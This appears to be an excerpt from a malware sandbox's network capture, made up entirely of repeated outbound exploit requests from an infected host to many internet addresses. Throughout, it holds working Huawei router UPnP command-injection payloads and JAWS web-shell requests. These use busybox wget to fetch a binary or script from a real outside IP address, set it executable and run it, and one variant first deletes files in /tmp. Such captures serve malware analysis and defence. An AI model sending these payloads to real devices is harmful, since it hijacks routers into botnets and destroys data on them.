                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          127192.168.2.1546742187.194.10.19680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:21.465106964 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          128192.168.2.1556554145.56.156.19580
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:21.470900059 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          129192.168.2.154499241.7.140.15137215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:21.559629917 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          130192.168.2.1548144156.60.233.037215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:21.629563093 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          131192.168.2.1560952156.136.36.3237215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:21.725461960 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          132192.168.2.1533914130.194.192.13180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.723191023 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          133192.168.2.1533266191.252.64.22180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.724204063 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          134192.168.2.153321827.157.203.19680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.725358009 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          135192.168.2.1538374166.170.65.20480
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.726417065 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          136192.168.2.1541832156.158.79.19137215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.726634026 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          137192.168.2.1537246156.231.87.11137215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.727698088 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          138192.168.2.1550488200.200.243.5680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.727813005 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          139192.168.2.1550216180.142.123.2780
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.730848074 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          140192.168.2.153431241.253.49.6637215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.730967045 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          141192.168.2.153912641.190.19.20037215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.731995106 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          142192.168.2.1547328117.127.29.4480
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.732084990 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          143192.168.2.1537570158.116.133.14480
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.733133078 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          144192.168.2.1549078197.88.243.21837215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.733232021 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          145192.168.2.1534360156.146.215.9837215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:22.734258890 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
